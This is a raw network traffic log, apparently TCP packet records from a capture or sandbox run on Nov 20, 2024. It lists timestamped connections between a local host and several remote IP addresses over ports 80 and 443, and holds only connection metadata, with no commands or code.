                                                                                                                                                                                            Nov 20, 2024 21:04:32.342724085 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.342858076 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.342901945 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:32.343663931 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.343776941 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.343811035 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:32.344588995 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.344706059 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.344753027 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:32.345534086 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.345690012 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.345726013 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:32.346474886 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.346642971 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.346683025 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:32.347392082 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.347702980 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.347739935 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:32.348349094 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.349033117 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.349082947 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:32.349272966 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.349697113 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.349733114 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:32.350210905 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.350311041 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.350349903 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:32.351150036 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.351994038 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.352030993 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:32.352119923 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.352130890 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.352178097 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:32.353029966 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.353404045 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.353450060 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:32.353945017 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.354401112 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.354440928 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:32.354876041 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.355447054 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.355480909 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:32.355807066 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.356236935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.356280088 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:32.356744051 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.356858015 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.356899977 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:32.357701063 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.357796907 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.357837915 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:32.358596087 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.393343925 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:32.511420012 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.511502981 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.511543989 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:32.511818886 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.512444973 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.512489080 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:32.512696981 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.512775898 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.512814999 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:32.513668060 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.515235901 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:32.515276909 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:32.528867006 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:32.555707932 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:40.425000906 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                            Nov 20, 2024 21:04:43.066076040 CET49756443192.168.2.4216.58.208.228
                                                                                                                                                                                            Nov 20, 2024 21:04:43.066159964 CET44349756216.58.208.228192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:43.066287994 CET49756443192.168.2.4216.58.208.228
                                                                                                                                                                                            Nov 20, 2024 21:04:43.066514969 CET49756443192.168.2.4216.58.208.228
                                                                                                                                                                                            Nov 20, 2024 21:04:43.066551924 CET44349756216.58.208.228192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:44.155111074 CET49759443192.168.2.42.16.229.162
                                                                                                                                                                                            Nov 20, 2024 21:04:44.155163050 CET443497592.16.229.162192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:44.155535936 CET49759443192.168.2.42.16.229.162
                                                                                                                                                                                            Nov 20, 2024 21:04:44.157099962 CET49759443192.168.2.42.16.229.162
                                                                                                                                                                                            Nov 20, 2024 21:04:44.157114029 CET443497592.16.229.162192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:44.773662090 CET44349756216.58.208.228192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:44.785257101 CET49756443192.168.2.4216.58.208.228
                                                                                                                                                                                            Nov 20, 2024 21:04:44.785289049 CET44349756216.58.208.228192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:44.787110090 CET44349756216.58.208.228192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:44.787209988 CET49756443192.168.2.4216.58.208.228
                                                                                                                                                                                            Nov 20, 2024 21:04:44.790376902 CET49756443192.168.2.4216.58.208.228
                                                                                                                                                                                            Nov 20, 2024 21:04:44.790554047 CET44349756216.58.208.228192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:44.831979990 CET49756443192.168.2.4216.58.208.228
                                                                                                                                                                                            Nov 20, 2024 21:04:44.831994057 CET44349756216.58.208.228192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:44.879507065 CET49756443192.168.2.4216.58.208.228
                                                                                                                                                                                            Nov 20, 2024 21:04:45.596823931 CET443497592.16.229.162192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:45.596903086 CET49759443192.168.2.42.16.229.162
                                                                                                                                                                                            Nov 20, 2024 21:04:45.604578972 CET49759443192.168.2.42.16.229.162
                                                                                                                                                                                            Nov 20, 2024 21:04:45.604598999 CET443497592.16.229.162192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:45.604962111 CET443497592.16.229.162192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:45.659499884 CET49759443192.168.2.42.16.229.162
                                                                                                                                                                                            Nov 20, 2024 21:04:45.673330069 CET49759443192.168.2.42.16.229.162
                                                                                                                                                                                            Nov 20, 2024 21:04:45.719347954 CET443497592.16.229.162192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:46.120091915 CET443497592.16.229.162192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:46.120254040 CET443497592.16.229.162192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:46.120412111 CET49759443192.168.2.42.16.229.162
                                                                                                                                                                                            Nov 20, 2024 21:04:46.124114990 CET49759443192.168.2.42.16.229.162
                                                                                                                                                                                            Nov 20, 2024 21:04:46.124134064 CET443497592.16.229.162192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:46.124145031 CET49759443192.168.2.42.16.229.162
                                                                                                                                                                                            Nov 20, 2024 21:04:46.124150991 CET443497592.16.229.162192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:46.271527052 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:46.271589994 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:46.271657944 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:46.272221088 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:46.272236109 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:46.312952995 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:46.313009024 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:46.313123941 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:46.313345909 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:46.313360929 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:46.337019920 CET49767443192.168.2.42.16.229.162
                                                                                                                                                                                            Nov 20, 2024 21:04:46.337129116 CET443497672.16.229.162192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:46.337218046 CET49767443192.168.2.42.16.229.162
                                                                                                                                                                                            Nov 20, 2024 21:04:46.337716103 CET49767443192.168.2.42.16.229.162
                                                                                                                                                                                            Nov 20, 2024 21:04:46.337754011 CET443497672.16.229.162192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:47.732556105 CET443497672.16.229.162192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:47.732671022 CET49767443192.168.2.42.16.229.162
                                                                                                                                                                                            Nov 20, 2024 21:04:47.748430014 CET49767443192.168.2.42.16.229.162
                                                                                                                                                                                            Nov 20, 2024 21:04:47.748467922 CET443497672.16.229.162192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:47.748872995 CET443497672.16.229.162192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:47.793719053 CET49767443192.168.2.42.16.229.162
                                                                                                                                                                                            Nov 20, 2024 21:04:47.876817942 CET49767443192.168.2.42.16.229.162
                                                                                                                                                                                            Nov 20, 2024 21:04:47.923346043 CET443497672.16.229.162192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.003843069 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.006299973 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.006311893 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.008023977 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.008112907 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.015042067 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.015127897 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.015481949 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.015487909 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.069494963 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.104890108 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.105182886 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.105192900 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.106483936 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.106561899 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.107990980 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.108098984 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.108267069 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.155349016 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.161910057 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.161921978 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.208584070 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.278918028 CET443497672.16.229.162192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.279017925 CET443497672.16.229.162192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.279087067 CET49767443192.168.2.42.16.229.162
                                                                                                                                                                                            Nov 20, 2024 21:04:48.280076981 CET49767443192.168.2.42.16.229.162
                                                                                                                                                                                            Nov 20, 2024 21:04:48.280108929 CET443497672.16.229.162192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.280126095 CET49767443192.168.2.42.16.229.162
                                                                                                                                                                                            Nov 20, 2024 21:04:48.280133963 CET443497672.16.229.162192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.506906986 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.506938934 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.506961107 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.506987095 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.506999016 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.507011890 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.507019043 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.507038116 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.507049084 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.507055998 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.507080078 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.620068073 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.620095968 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.620104074 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.620121002 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.620129108 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.620160103 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.620172977 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.620183945 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.620194912 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.620213985 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.620222092 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.684132099 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.684170008 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.684206963 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.684233904 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.684246063 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.685650110 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.741261959 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.741290092 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.741353035 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.741369963 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.741381884 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.741409063 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.771708965 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.771810055 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.771821976 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.771836042 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.771974087 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.772109985 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.772125006 CET4434976113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.772135973 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.772176027 CET49761443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.808702946 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.808731079 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.808779001 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.808793068 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.808825970 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.808851004 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.854157925 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.854186058 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.854221106 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.854233027 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.854259014 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.854269028 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.923552990 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.923599958 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.923778057 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.924146891 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.924159050 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.984777927 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.984802008 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.984838963 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:48.984852076 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:48.984886885 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:49.022255898 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.022275925 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.022339106 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:49.022350073 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.022388935 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:49.040219069 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.040241003 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.040306091 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:49.040318966 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.040359974 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:49.060810089 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.060817957 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.060926914 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:49.060933113 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.060986042 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:49.458802938 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.458813906 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.458832026 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.458904028 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:49.458909035 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.458945990 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:49.458956957 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.458975077 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.459045887 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:49.459045887 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:49.459049940 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.459080935 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:49.459088087 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.459101915 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.459177017 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:49.459177017 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:49.459182024 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.459213018 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:49.459290028 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.459347963 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.459348917 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:49.459357977 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.459399939 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:49.459497929 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.459517002 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.459589958 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:49.459589958 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:49.459593058 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:49.459798098 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:49.460175037 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:49.480357885 CET49766443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:49.480377913 CET4434976613.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:50.721371889 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:50.721786022 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:50.721817970 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:50.723270893 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:50.723355055 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:50.725578070 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:50.725658894 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:50.726115942 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:50.726133108 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:50.780065060 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:51.227479935 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:51.227508068 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:51.227516890 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:51.227533102 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:51.227541924 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:51.227545023 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:51.227562904 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:51.227606058 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:51.227619886 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:51.227653980 CET49771443192.168.2.413.107.246.63
                                                                                                                                                                                            Nov 20, 2024 21:04:51.415154934 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:51.415200949 CET4434977113.107.246.63192.168.2.4
                                                                                                                                                                                            Nov 20, 2024 21:04:51.415277004 CET49771443192.168.2.413.107.246.63
